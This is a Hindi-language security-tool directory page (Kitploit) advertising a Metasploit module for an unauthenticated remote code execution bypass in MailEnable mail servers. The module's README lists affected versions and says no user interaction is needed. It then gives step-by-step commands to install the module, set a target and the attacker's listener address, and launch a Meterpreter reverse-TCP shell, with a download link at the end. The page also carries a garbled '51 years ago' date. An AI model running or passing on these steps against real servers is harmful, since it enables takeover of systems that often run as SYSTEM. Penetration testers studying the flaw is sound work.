Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
mailenable-cve-2022-36934 — MailEnable CVE-2022-36934 प्रमाणीकरण बाईपास RCE के लिए मेटास्प्लॉइट मॉड्यूल | Kitploit
उपकरण/GitHubGitHub/tdawg506/mailenable-cve-2022-36934
शोषण फ्रेमवर्कभेद्यता विश्लेषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubtdawg506/mailenable-cve-2022-36934

mailenable-cve-2022-36934

MailEnable CVE-2022-36934 प्रमाणीकरण बाईपास RCE के लिए मेटास्प्लॉइट मॉड्यूल

रिपॉजिटरी देखें
51 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

MailEnable CVE-2022-36934 शोषण मॉड्यूल

Metasploit License

MailEnable के प्रमाणीकरण बायपास भेद्यता (CVE-2022-36934) के लिए Metasploit मॉड्यूल, जो दूरस्थ कोड निष्पादन की ओर ले जाता है।

📌 विशेषताएँ

  • SMTP/POP3 में MailEnable के अनुचित इनपुट स्वच्छता का शोषण करता है
  • x86 और x64 Windows लक्ष्यों दोनों का समर्थन करता है
  • कोई उपयोगकर्ता इंटरैक्शन आवश्यक नहीं (तैयार ईमेल के माध्यम से स्वचालित रूप से ट्रिगर)
  • MailEnable संस्करण < 10.40 के विरुद्ध काम करता है

🚀 स्थापना

  1. Metasploit मॉड्यूल निर्देशिका में कॉपी करें:
    root@kitploit:~
    cp modules/exploits/windows/smtp/mailenable_authbypass_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/smtp/
    
    
  2. msfconsole में मॉड्यूल पुनः लोड करें:

reload_all

  1. उपयोग:

use exploit/windows/smtp/mailenable_authbypass_rce set RHOSTS <target_ip> set LHOST <your_ip> set PAYLOAD windows/x64/meterpreter/reverse_tcp exploit

🎯 परीक्षण के विरुद्ध:

MailEnable Professional 10.25 Windows Server 2019 MailEnable Enterprise 10.30 Windows Server 2016

📝 तकनीकी विवरण:

  • भेद्यता: SMTP/POP3 में SQLi-जैसे सिंटैक्स के माध्यम से प्रमाणीकरण बायपास
  • हमला वेक्टर: नेटवर्क (पोर्ट 25/110)
  • विशेषाधिकार: MailEnable सेवा खाते (अक्सर SYSTEM) के रूप में चलता है

⚠️ कानूनी अस्वीकरण:

यह उपकरण केवल अधिकृत परीक्षण के लिए है। उन प्रणालियों के विरुद्ध कभी उपयोग न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है.```

टूल डाउनलोड करें